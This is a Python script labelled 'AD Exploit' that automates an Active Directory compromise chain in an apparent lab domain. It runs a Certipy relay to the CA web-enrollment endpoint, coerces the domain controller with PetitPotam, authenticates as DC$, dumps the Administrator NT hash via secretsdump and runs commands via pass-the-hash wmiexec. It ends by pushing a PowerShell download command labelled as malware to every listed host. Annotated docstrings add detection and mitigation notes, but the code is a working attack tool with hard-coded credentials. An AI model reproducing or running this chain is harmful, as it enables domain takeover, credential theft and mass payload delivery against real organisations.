AD Exploit
| import subprocess | |
| import ipaddress | |
| from time import sleep | |
| import os | |
| import argparse | |
| env = os.environ.copy() | |
def info(s, *rest):
    """Print *s* followed by any extra values in green (ANSI SGR 92).

    The first value is prefixed with the colour code; the reset sequence is
    appended as a separate print argument, so it is preceded by a space.
    """
    green_on = "\033[92m"
    reset = "\033[0m"
    print(green_on + format(s), *rest, reset)
def alert(s, *rest):
    """Print *s* followed by any extra values in red (ANSI SGR 91).

    Same layout as :func:`info`: colour code glued to the first value, reset
    sequence appended as a separate (space-separated) argument.
    """
    red_on = "\033[91m"
    reset = "\033[0m"
    print(red_on + format(s), *rest, reset)
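def is_valid_ip(ip):
    """Return ``True`` if *ip* parses as an IPv4 or IPv6 address, else ``False``.

    Only ``ValueError`` is caught, which is what :func:`ipaddress.ip_address`
    raises for anything it cannot parse (including ``None`` and ``""``).  The
    original bare ``except`` also swallowed ``KeyboardInterrupt`` and
    ``SystemExit``, which a validator has no business hiding.
    """
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return False
    return True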
def sync_time(domain_name):
    """Run ``sudo ntpdate <domain_name>`` and print what it returned.

    Not called from ``main()`` in this file.

    NOTE(review): the second positional argument of ``subprocess.run`` is
    ``bufsize``, so passing ``sudo_password`` there raises ``TypeError``
    before ``sudo`` runs, and without ``capture_output`` ``result.stdout``
    would be ``None`` anyway.  The hard-coded local sudo password is a
    credential-in-source finding in its own right.
    """
    sudo_password = "kali"
    try:
        result = subprocess.run(
            ["sudo", "ntpdate", domain_name], sudo_password)
        info("Stdout: ", result.stdout)
    except Exception as e:
        alert("Error syncing time with AD:", e)
        exit(1)
def certipy_ad(ca_domain_name):
    """Start ``certipy-ad relay`` in the background and return the ``Popen``.

    The relay is pointed at ``http://<ca_domain_name>`` with the
    ``DomainController`` template.  stdout/stderr are piped but never read
    here (the readline loop below is commented out), so a chatty relay can
    block on a full pipe; the caller is expected to ``terminate()`` the
    returned process.  Any startup failure exits the whole script.

    NOTE(review): this looks like the AD CS web-enrollment relay (ESC8 in
    Certipy's numbering).  From the defensive side it relies on the
    enrollment endpoint accepting NTLM over plain HTTP; Extended Protection
    for Authentication / HTTPS-only enrollment and NTLM restrictions on the
    CA remove the condition, and a DomainController-template request over
    web enrollment is a high-signal event to alert on.
    """
    info("[+] CA domain name:", ca_domain_name)
    try:
        proc = subprocess.Popen(
            [
                "certipy-ad", "relay",
                "-target", f"http://{ca_domain_name}",
                "-template", "DomainController"
            ],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
            cwd="./"
        )
        info("[+] certipy-ad relay listener started")
        # for _ in range(5):
        #     line = proc.stdout.readline()
        #     if line:
        #         print(line.strip())
        #     else:
        #         break
        return proc
    except Exception as e:
        alert("Error running certipy-ad:", e)
        exit(1)
def petit_potam(attacker_ip, target_ip, domain_user_username, domain_user_password, domain_name):
    """Run ``PetitPotam.py`` (expected in the current directory) and print its stdout.

    Both IPs are checked with :func:`is_valid_ip` first; an invalid one exits
    the script.  Note that ``-dc-ip`` is passed ``domain_name`` rather than
    ``target_ip``, and the bare ``except`` discards the exception object, so
    a failure only prints the generic message.

    NOTE(review): this is the authentication-coercion step that feeds the
    relay started in :func:`certipy_ad`.  Defensively, the relevant controls
    are the vendor patches for the coercion vector and restricting NTLM
    outbound from domain controllers; an RPC call to the DC immediately
    followed by an NTLM authentication from the DC to a non-DC host is the
    pattern to detect.
    """
    if not is_valid_ip(attacker_ip) or not is_valid_ip(target_ip):
        alert("Invalid attacker IP or target IP")
        exit(1)
    try:
        result = subprocess.run(['python', 'PetitPotam.py', "-u", domain_user_username, "-p",
                                 domain_user_password, "-d", domain_name, "-dc-ip", domain_name, attacker_ip, target_ip], capture_output=True, text=True)
        print("Stdout:", result.stdout)
    except:
        alert("Error running PetitPotam.py")
        exit(1)
def get_tgt(target_ip, domain_name):
    """Run ``certipy-ad auth`` with ``dc.pfx`` as user ``DC$`` and print its stdout.

    ``dc.pfx`` is read from the current directory; ``main()`` checks that it
    exists before calling this, and afterwards looks for ``dc.ccache`` in the
    same directory.  Nothing is returned; a launch failure exits the script.

    NOTE(review): a certificate-based logon for a machine account whose
    certificate was issued moments earlier via web enrollment is the
    correlation worth alerting on (certificate issuance event + PKINIT
    logon for the same principal).
    """
    try:
        result = subprocess.run(["certipy-ad", "auth", "-pfx", "dc.pfx", "-dc-ip", target_ip,
                                 "-domain", domain_name, "-username", "DC$"], capture_output=True, text=True)
        print("Stdout:", result.stdout)
    except Exception as e:
        alert("Error getting TGT:", e)
        exit(1)
def get_hash(domain_name, dc_domain_name):
    """Dump the ``Administrator`` secrets with ``impacket-secretsdump`` and return ``lm:nt``.

    Runs with ``-k -no-pass``, i.e. Kerberos auth from the ccache that
    ``main()`` put into ``env["KRB5CCNAME"]`` (``env`` is the module-level
    copy passed via ``env=env``).  The parse takes everything before the first
    ``:::`` and keeps the last two colon-separated fields, which in
    secretsdump's ``user:rid:lm:nt:::`` layout are the LM and NT hashes.
    If stdout is empty (auth or replication failed) the result is ``""``
    rather than an error.  The local ``hash`` shadows the builtin.

    NOTE(review): ``-just-dc-user`` pulls one account through directory
    replication (DCSync-style).  Because the caller is the DC machine
    identity obtained above, replication-source alerts keyed on non-DC
    accounts will not fire; correlate with the preceding certificate
    issuance instead.
    """
    try:
        result = subprocess.run(["impacket-secretsdump", "-k", "-just-dc-user", "Administrator", "-no-pass", f"{
            domain_name}/dc\\$@{dc_domain_name}"], capture_output=True, text=True, env=env)
        print("Stdout:", result.stdout)
        hash = result.stdout.split(":::")[0].split(":")[-2:]
        info(f"Hash: {hash}")
        return ":".join(hash)
    except Exception as e:
        alert("Error getting hash:", e)
        exit(1)
def exec_single_cmd(hash, domain_name, dc_domain_name, cmd):
    """Run one command on the DC via ``impacket-wmiexec`` using pass-the-hash.

    Authenticates as ``<domain>/Administrator`` with ``-hashes hash``
    (``hash`` shadows the builtin).  Only the part of stdout after the
    ``[*] SMBv3.0 dialect used`` banner is printed; if the banner is absent
    the whole stdout is printed.  ``check=`` is not set, so a non-zero exit
    from wmiexec is not an error here.

    NOTE(review): detection-wise this shows up as WmiPrvSE spawning
    ``cmd.exe`` on the DC with an SMB share write for the output file, plus
    an NTLM logon for Administrator from a non-admin workstation.
    """
    try:
        result = subprocess.run(["impacket-wmiexec", "-hashes", hash, f"{
            domain_name}/Administrator@{dc_domain_name}", cmd], capture_output=True, text=True)
        output = result.stdout.split("[*] SMBv3.0 dialect used")[-1]
        print(f"{output}")
    except Exception as e:
        alert("Error executing command:", e)
        exit(1)
def exec_cmds(hash, domain_name, dc_domain_name, cmds: list[str]):
    """Run each command in *cmds* on the DC via ``impacket-wmiexec`` (pass-the-hash).

    One wmiexec invocation per command; the full stdout of each is printed
    after a green ``> <cmd>`` header.  Unlike :func:`exec_single_cmd` no
    banner trimming is done (that line is commented out).  The first
    exception aborts the remaining commands and exits the script.
    """
    try:
        for c in cmds:
            result = subprocess.run(["impacket-wmiexec", "-hashes", hash, f"{
                domain_name}/Administrator@{dc_domain_name}", c], capture_output=True, text=True)
            # output = result.stdout.split("\n")[-3]
            output = result.stdout
            info(f"> {c}")
            print(f"{output}")
    except Exception as e:
        alert("Error executing command:", e)
        exit(1)
# def generate_targets_from_ad(username, password, domain_name, target_ip):
#     info("[*] Generating targets.txt from Active Directory...")
#     csv_output = "ad_computers.csv"
#     try:
#         subprocess.run([
#             "impacket-GetADComputers",
#             f"{domain_name}/{username}:{password}@{target_ip}",
#             "-dc-ip", target_ip
#         ], check=True)
#
#         with open(csv_output) as f:
#             lines = f.readlines()[1:]  # Skip header
#         with open("targets.txt", "w") as out:
#             for line in lines:
#                 name = line.split(",")[0].strip()
#                 fqdn = f"{name}.{domain_name}"
#                 out.write(fqdn + "\n")
#
#         info("[+] targets.txt generated!")
#
#     except Exception as e:
#         alert("Error generating targets:", e)
#         exit(1)
def distribute_malware(hash, domain_name, dc_domain_name, filepath_url, filename):
    """Push a download command to every host listed in ``targets.txt``.

    Reads ``targets.txt`` from the current directory (blank lines skipped)
    and, for each host, runs ``impacket-wmiexec`` as ``<domain>/Administrator``
    with ``-hashes hash`` executing a PowerShell ``Invoke-WebRequest`` that
    fetches *filepath_url* into ``C:\\Windows\\Temp``.  The ``filename`` and
    ``dc_domain_name`` parameters are not used; the output path is the
    literal ``(unknown)`` from the format string.  ``check=`` is not set, so
    the "successfully" message is printed whenever wmiexec could be
    launched, regardless of what happened on the target.

    NOTE(review): the observable pattern for defenders is WmiPrvSE spawning
    ``powershell.exe`` with ``Invoke-WebRequest`` writing under
    ``C:\\Windows\\Temp`` on many hosts in quick succession, all from one
    source address using the domain Administrator account.
    """
    with open("targets.txt") as f:
        targets = [line.strip() for line in f if line.strip()]
    for target in targets:
        info(f"[+] Sending malware to {target}...")
        cmd = f"powershell -Command \"Invoke-WebRequest {
            filepath_url} -OutFile C:\\Windows\\Temp\\(unknown)\""
        try:
            result = subprocess.run(["impacket-wmiexec", "-hashes", hash,
                                     f"{domain_name}/Administrator@{target}", cmd],
                                    capture_output=True, text=True)
            print(result.stdout)
            info(f"[+] successfully send malware to {target}")
        except Exception as e:
            alert("[-] Failed to send malware:", e)
def main():
    """Run the whole chain against the hard-coded lab parameters below.

    Order: start the certipy relay, wait 5 s, coerce with PetitPotam, wait
    5 s, stop the relay, require ``dc.pfx``, authenticate as ``DC$`` and
    require ``dc.ccache``, export it through ``env["KRB5CCNAME"]``, dump the
    Administrator hash, then run commands on the DC (interactive ``Cmd>``
    loop with ``-i``, otherwise the fixed ``cmds`` list) and finally fan the
    download command out to ``targets.txt``.  ``sync_time`` is never called.

    NOTE(review): the domain user credentials, addresses, domain name and
    payload URL are literals in source; a script like this should take them
    from arguments or the environment, and the gist as published leaks the
    lab password.  The two ``sleep(5)`` calls are fixed waits, not checks
    that the relay or coercion actually completed.  The local ``hash``
    shadows the builtin.
    """
    parser = argparse.ArgumentParser(
        description="Certipy + PetitPotam attacking script")
    parser.add_argument("-i", "--interactive",
                        action="store_true", help="Run in interactive mode")
    args = parser.parse_args()

    # Lab parameters (hard-coded).
    attacker_ip = "172.18.0.200"
    target_ip = "172.18.0.100"
    domain_user_username = "pxe"
    domain_user_password = "B00table1234!"
    domain_name = "x-team.blue"
    ca_domain_name = f"ca.{domain_name}"
    dc_domain_name = f"dc.{domain_name}"
    filepath_url = "https://blog.cx330.tw/assets/Resume.pdf"
    filename = "resume.pdf"
    cmds = [
        "whoami",
        "dir",
        "ipconfig",
    ]

    # certipy_ad() exits the script on failure, so certipy_proc is always a
    # live Popen here; the truthiness check below is therefore always taken.
    certipy_proc = certipy_ad(ca_domain_name)
    info("[+] Wait for PetitPotam to start...")
    sleep(5)
    petit_potam(
        attacker_ip,
        target_ip,
        domain_user_username,
        domain_user_password,
        domain_name
    )
    info("[+] Wait for certificate...")
    sleep(5)
    if certipy_proc:
        certipy_proc.terminate()
        print("[+] certipy-ad listener terminated")
    # dc.pfx is whatever the relay wrote to the current directory.
    if os.path.exists("dc.pfx"):
        print("[+] dc.pfx found!")
    else:
        alert("[-] dc.pfx NOT found!")
        exit(1)
    get_tgt(target_ip, domain_name)
    # The ccache is handed to secretsdump through the module-level env copy
    # (see get_hash); the parent process environment is not changed.
    if os.path.exists("dc.ccache"):
        env["KRB5CCNAME"] = "./dc.ccache"
        print("[+] TGT session exported")
    else:
        alert("[-] No dc.ccache found :(")
        exit(1)
    print(env["KRB5CCNAME"])
    # time.sleep(5)
    hash = get_hash(domain_name, dc_domain_name)
    if args.interactive:
        while True:
            cmd = input("Cmd> ")
            if cmd == "exit":
                break
            exec_single_cmd(hash, domain_name, dc_domain_name, cmd=cmd)
    else:
        exec_cmds(hash, domain_name, dc_domain_name, cmds=cmds)
    # generate_targets_from_ad(domain_user_username,
    #                          domain_user_password, domain_name, target_ip)
    info("[+] Start distrubuting malwares")
    distribute_malware(hash, domain_name, dc_domain_name,
                       filepath_url, filename)
    info("[+] Malware distributed successfully!")
# Entry point guard: importing this module only defines the helpers and
# the `env` snapshot; the chain in main() runs only when executed directly.
if __name__ == '__main__':
    main()